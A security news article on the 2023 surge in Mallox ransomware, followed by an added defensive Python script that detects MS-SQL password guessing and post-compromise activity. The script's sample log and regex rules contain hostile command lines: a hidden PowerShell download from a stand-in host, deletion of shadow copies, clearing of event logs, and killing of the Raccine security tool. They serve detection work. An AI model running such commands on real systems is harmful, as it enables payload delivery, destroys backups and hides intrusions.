According to a recent report from Palo Alto Networks Unit 42, Mallox ransomware activity in 2023 has surged by 174%, a significant increase over the previous year. Mallox follows the double-extortion model common among ransomware threat actors: it steals data before encrypting an organization’s files and then threatens to publish the stolen data on a leak site to pressure victims into paying the ransom. Linked to other ransomware strains such as TargetCompany, Tohnichi, Fargo, and the newly identified Xollam variant, Mallox first emerged in June 2021.
The group displays a distinctive pattern of targeting sectors like manufacturing, professional and legal services, and wholesale and retail. Notably, Mallox exploits poorly secured MS-SQL servers through dictionary attacks, serving as a penetration vector to compromise victims’ networks. The introduction of the Xollam variant marks a shift in tactics, utilizing malicious OneNote file attachments for initial access, as highlighted by Trend Micro.
Upon successfully infiltrating a host, Mallox executes a PowerShell command to retrieve the ransomware payload from a remote server. The ransomware binary takes various measures, including stopping SQL-related services, deleting volume shadow copies, clearing system event logs, terminating security-related processes, and attempting to bypass Raccine, an open-source tool designed to counter ransomware attacks. While TargetCompany remains a relatively small and closed group, it has been observed recruiting affiliates for the Mallox Ransomware-as-a-Service (RaaS) program on the RAMP cybercrime forum.
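The two behaviours described above, dictionary attacks against exposed MS-SQL servers and the post-compromise clean-up steps (stopping SQL services, deleting shadow copies, clearing event logs, killing Raccine), are the kind of activity a SOC can detect from authentication and process-creation telemetry. The following is an added example written for this page; it is not code from Unit 42, Trend Micro, or the Mallox operators. The log line formats, the failure threshold and window, the exact command-line patterns, and the Raccine process name are assumptions chosen for illustration; the page itself does not quote the commands Mallox uses.

```python
"""Defender-side detection helpers for the Mallox tradecraft described above.

Added example, not code from any source named on the page. Log formats,
thresholds and command patterns are assumptions for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of MS-SQL authentication audit lines. Assumed format:
# "<ISO timestamp> <event_id> <FAILED|SUCCESS> user=<login> src=<ip>"
# (SQL Server logs failed logins as event 18456; the layout here is simplified).
MSSQL_AUTH_LOG = """\
2023-08-01T02:14:01 18456 FAILED user=sa src=198.51.100.23
2023-08-01T02:14:02 18456 FAILED user=sa src=198.51.100.23
2023-08-01T02:14:02 18456 FAILED user=sa src=198.51.100.23
2023-08-01T02:14:03 18456 FAILED user=sa src=198.51.100.23
2023-08-01T02:14:04 18456 FAILED user=sa src=198.51.100.23
2023-08-01T02:14:05 18456 FAILED user=sa src=198.51.100.23
2023-08-01T02:14:09 18453 SUCCESS user=sa src=198.51.100.23
2023-08-01T02:15:30 18456 FAILED user=reporting src=10.0.0.7
2023-08-01T09:00:00 18453 SUCCESS user=reporting src=10.0.0.7
"""

# Constructed sample of process-creation lines. Assumed format:
# "<ISO timestamp> host=<name> parent=<image> cmd=<command line>"
PROCESS_LOG = """\
2023-08-01T02:16:10 host=db01 parent=sqlservr.exe cmd=cmd.exe /c powershell -w hidden -nop -c Invoke-WebRequest -Uri http://placeholder.invalid/p -OutFile C:\\Users\\Public\\p.exe
2023-08-01T02:16:40 host=db01 parent=p.exe cmd=net stop MSSQLSERVER /y
2023-08-01T02:16:41 host=db01 parent=p.exe cmd=vssadmin delete shadows /all /quiet
2023-08-01T02:16:42 host=db01 parent=p.exe cmd=wevtutil cl System
2023-08-01T02:16:43 host=db01 parent=p.exe cmd=taskkill /F /IM RaccineSettings.exe
2023-08-01T09:05:00 host=ws12 parent=explorer.exe cmd=notepad.exe C:\\notes.txt
"""

AUTH_RE = re.compile(
    r"^(?P<ts>\S+) (?P<eid>\d+) (?P<result>FAILED|SUCCESS) user=(?P<user>\S+) src=(?P<src>\S+)$")
PROC_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$")

# Command-line patterns for the post-compromise steps the article lists.
# These are commonly seen commands and are assumptions, not quotes from the page.
POST_COMPROMISE_PATTERNS = {
    "payload_download_via_powershell": re.compile(
        r"powershell[^\n]*(invoke-webrequest|downloadstring|downloadfile|\biwr\b)", re.I),
    "stop_sql_service": re.compile(r"\b(net\s+stop|sc\s+stop)\s+\S*(mssql|sql)", re.I),
    "delete_shadow_copies": re.compile(
        r"(vssadmin[^\n]*delete\s+shadows|wmic[^\n]*shadowcopy\s+delete)", re.I),
    "clear_event_log": re.compile(r"\bwevtutil(\.exe)?\s+cl\b", re.I),
    # Raccine process name assumed; extend with other security tools as needed.
    "kill_security_process": re.compile(r"\btaskkill\b[^\n]*raccine", re.I),
}
SHELL_RE = re.compile(r"(cmd|powershell)(\.exe)?\b", re.I)


def detect_sql_password_guessing(text, threshold=5, window=timedelta(minutes=1)):
    """Flag each source IP with `threshold` or more failed MS-SQL logins inside
    `window`, and record whether a successful login from that source followed
    the burst (the signature of a dictionary attack that worked)."""
    failures, successes = defaultdict(list), defaultdict(list)
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if not m:
            continue
        ts = datetime.fromisoformat(m["ts"])
        (failures if m["result"] == "FAILED" else successes)[m["src"]].append(ts)
    findings = {}
    for src, times in failures.items():
        times.sort()
        for i, start in enumerate(times):          # sliding window over failures
            j = i
            while j < len(times) and times[j] - start <= window:
                j += 1
            if j - i >= threshold:
                burst_end = times[j - 1]
                followed = any(start <= s <= burst_end + window for s in successes.get(src, []))
                findings[src] = {"failures_in_window": j - i,
                                 "window_start": start.isoformat(),
                                 "success_after_burst": followed}
                break
    return findings


def scan_process_log(text):
    """Return (timestamp, host, rule_name) for every process-creation line that
    matches a post-compromise pattern or shows SQL Server spawning a shell."""
    alerts = []
    for line in text.splitlines():
        m = PROC_RE.match(line)
        if not m:
            continue
        hits = [name for name, pat in POST_COMPROMISE_PATTERNS.items() if pat.search(m["cmd"])]
        # sqlservr.exe launching cmd/powershell is the classic sign of a
        # compromised SQL login being used for command execution.
        if m["parent"].lower() == "sqlservr.exe" and SHELL_RE.match(m["cmd"]):
            hits.append("sql_server_spawning_shell")
        alerts.extend((m["ts"], m["host"], h) for h in hits)
    return alerts


if __name__ == "__main__":
    for src, info in detect_sql_password_guessing(MSSQL_AUTH_LOG).items():
        print("password guessing from", src, info)
    for ts, host, rule in scan_process_log(PROCESS_LOG):
        print(ts, host, rule)
```

On the constructed input the first detector flags only 198.51.100.23 (six failures in four seconds followed by a success), and the second produces six alerts, all on host db01, none for the benign notepad launch. In production the same logic would run over SQL Server error-log or Windows Security events and Sysmon/EDR process-creation events; the threshold and window should be tuned to the environment, and an alert on `sql_server_spawning_shell` merits immediate attention since the article describes the PowerShell download happening right after the MS-SQL compromise.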
The surge in Mallox infections reflects a broader trend, with a 221% year-over-year increase in ransomware attacks as of June 2023. The rise is largely attributed to Cl0p’s exploitation of the MOVEit file transfer software vulnerability, contributing to 434 reported attacks in June 2023 alone. The financial motivation for ransomware remains high, with cybercriminals netting at least $449.1 million in the first half of 2023, according to Chainalysis.
Expressing concern over the heightened activity of the Mallox ransomware group in recent months, researchers emphasize the potential for more attacks, especially with ongoing recruiting efforts for affiliates. This underscores the evolving tactics of ransomware groups and the urgent need for organizations to bolster their cybersecurity measures to effectively counter these dynamic threats.